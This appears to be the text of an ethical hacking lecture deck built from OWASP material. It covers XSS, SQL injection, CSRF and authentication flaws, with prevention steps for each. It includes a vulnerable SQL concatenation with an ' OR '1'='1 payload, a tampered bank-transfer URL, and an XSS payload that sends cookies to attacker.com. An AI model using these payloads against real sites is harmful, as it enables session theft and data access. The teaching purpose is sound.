Hacking the Web

HACKING THE WEB
CONTENT LOVINGLY RIPPED
FROM OWASP.ORG

CROSS SITE SCRIPTINGL HACKING RGU ETH
GU ETHICAL HACKING RGU ETHICAL HACKIN
SQL INJECTIONHACKING RGU ETHICAL HACK
NGRGU ETHICAL HACKINGRGU ETHICAL HAC
COOKIE EDITINGACKING RGU ETHICAL HACK
RGU ETHICAL HACKINGRGU ETHICAL HACKI
CROSS SITE REQUEST FORGERYL HACKING
CKINGRGU ETHICAL HACKINGRGU ETHICAL
HACKINGRGU ETHICAL HACKINGRGU ETHIC
SENSITIVE DATA EXPOSURE RGU ETHICAING

CROSS SITE SCRIPTING
SQL INJECTION
CROSS SITE REQUEST FORGERY
SENSITIVE DATA EXPOSURE
COOKIE EDITING
L HACKING RGU ETH
GU ETHICAL HACKING RGU ETHICAL HACKIN
HACKING RGU ETHICAL HACK
NGRGU ETHICAL HACKINGRGU ETHICAL HAC
ACKING RGU ETHICAL HACK
RGU ETHICAL HACKINGRGU ETHICAL HACKI
L HACKING
CKINGRGU ETHICAL HACKINGRGU ETHICAL
HACKINGRGU ETHICAL HACKINGRGU ETHIC
RGU ETHICAING

SQL INJECTION
COOKIE EDITING
RGU ETHICAL HACKING RGU ETHICAL HA
AL HACKING RGU ETHICAL HACKING
RGU ETHICAL HACKING RGU ETHICAL HACKING
HICAL HACKING
RGU ETHICAL HACKINGKING
RGU ETHICAL H
RGU ETHICA
RGU E
ATTACK
ATTACK
ATTACK
WEAKNESS
WEAKNESS
WEAKNESS
WEAKNESS
CONTROL
CONTROL
ASSETS
FUNCTIONS
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Security 
Controls
Technical 
Impacts
Business 
Impacts
ATTACK
WEAKNESS
CONTROL
FUNCTIONS
IMPACT
IMPACT
IMPACTIMPACT

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Security 
Controls
Technical 
Impacts
Business 
Impacts

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
APPLICATION SPECIFIC
DIFFICULT
UNCOMMON
AVERAGE
SEVERE
Prevalence
Detectability

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
STEPS TO PREVENT
Considering the threats you plan to protect this data from (e.g., insider attack,
external user), make sure you encrypt all sensitive data at rest and in transit in a
manner that defends against these threats.
Don’t store sensitive data unnecessarily. Discard it as soon as possible. Data you
don’t have can’t be stolen.
Ensure strong standard algorithms and strong keys are used, and proper key
management is in place.
Ensure passwords are stored with an algorithm speciﬁcally designed for password
protection, such as bcrypt, PBKDF2, or scrypt.
Disable autocomplete on forms collecting sensitive data and disable caching for
pages that contain sensitive data.

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
AVERAGE
COMMON
EASY
MODERATE
Prevalence
Detectability

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
AVERAGE
COMMON
EASY
MODERATE
Prevalence
Detectability
HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=4321&AMOUNT=500
HTTP://WWW.MYAMAZINGBANK.COM/TRANSFERFUNDS.PHP?FROM=1234&TO=666&AMOUNT=5000
VERY EASY ATTACK. SOMETHING LIKE THIS…
CAN BE CHANGED TO THIS

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
STEPS TO PREVENT
The preferred option is to include the unique token in a hidden ﬁeld. This causes the
value to be sent in the body of the HTTP request, avoiding its inclusion in the URL,
which is more prone to exposure.
The unique token can also be included in the URL itself, or a URL parameter.
However, such placement runs a greater risk that the URL will be exposed to an
attacker, thus compromising the secret token.
Requiring the user to re-authenticate, or prove they are a user (e.g., via a CAPTCHA)
can also protect against CSRF.
Easiest ﬁx, when dealing with forms, is to change it from GET to POST

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
AVERAGE
WIDESPREAD
AVERAGE
SEVERE
Prevalence
Detectability
BROKEN
AUTHENTICATION
AND SESSION
MANAGEMENT

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
STEPS TO PREVENT
The primary recommendation for an organisation is to make available to
developers:
A single set of strong authentication and session management controls. Such
controls should strive to:
1. meet all the authentication and session management requirements deﬁned in
OWASP’s Application Security Veriﬁcation Standard (ASVS) areas V2
(Authentication) and V3 (Session Management).
2. have a simple interface for developers. Consider the ESAPI Authenticator and
User APIs as good examples to emulate, use, or build upon.

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
EASY
COMMON
AVERAGE
SEVERE
Prevalence
Detectability

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
EASY
COMMON
AVERAGE
SEVERE
Prevalence
Detectability
STRING QUERY = "SELECT * FROM ACCOUNTS WHERE CUSTID='" + REQUEST.GETPARAMETER("ID") + "'";
HTTP://EXAMPLE.COM/APP/ACCOUNTVIEW?ID=' OR '1'='1

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
STEPS TO PREVENT
Preventing injection requires keeping untrusted data separate from commands and
queries.
The preferred option is to use a safe API which avoids the use of the interpreter
entirely or provides a parameterised interface. Be careful with APIs, such as stored
procedures, that are parameterised, but can still introduce injection under the hood.
If a parameterised API is not available, you should carefully escape special
characters using the speciﬁc escape syntax for that interpreter. OWASP’s ESAPI
provides many of these escaping routines.

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
Threat 
Agents
Attack 
Vectors
Security 
Weaknesses
Technical 
Impacts
Business 
Impacts
AVERAGE
VERY WIDESPREAD
EASY
MODERATE
Prevalence
Detectability
(STRING) PAGE += "<INPUT NAME='CREDITCARD' TYPE='TEXT' VALUE='" +
REQUEST.GETPARAMETER("CC") + "'>";
'><SCRIPT>DOCUMENT.LOCATION= 'HTTP://WWW.ATTACKER.COM/CGI-BIN/COOKIE.CGI ?
FOO='+DOCUMENT.COOKIE</SCRIPT>'.

SQL INJECTION
COOKIE EDITING
HICAL HACKING
RGU ETHICAL H
RGU ETHICA
RGU E
STEPS TO PREVENT
Preferred option is to properly escape all untrusted data based on the HTML context
(body, attribute, JavaScript, CSS, or URL) that the data will be placed into.
Positive or “whitelist” input validation is also recommended as it helps protect
against XSS, but is not a complete defense as many applications require special
characters in their input. For rich content, consider auto-sanitization libraries like the
Java HTML Sanitizer Project.
Consider Content Security Policy (CSP) to defend against XSS across your entire site.

SQL INJECTION
COOKIE EDITING

Hacking the Web

More Related Content

What's hot

Similar to Hacking the Web

More from Mike Crabb

Recently uploaded

Hacking the Web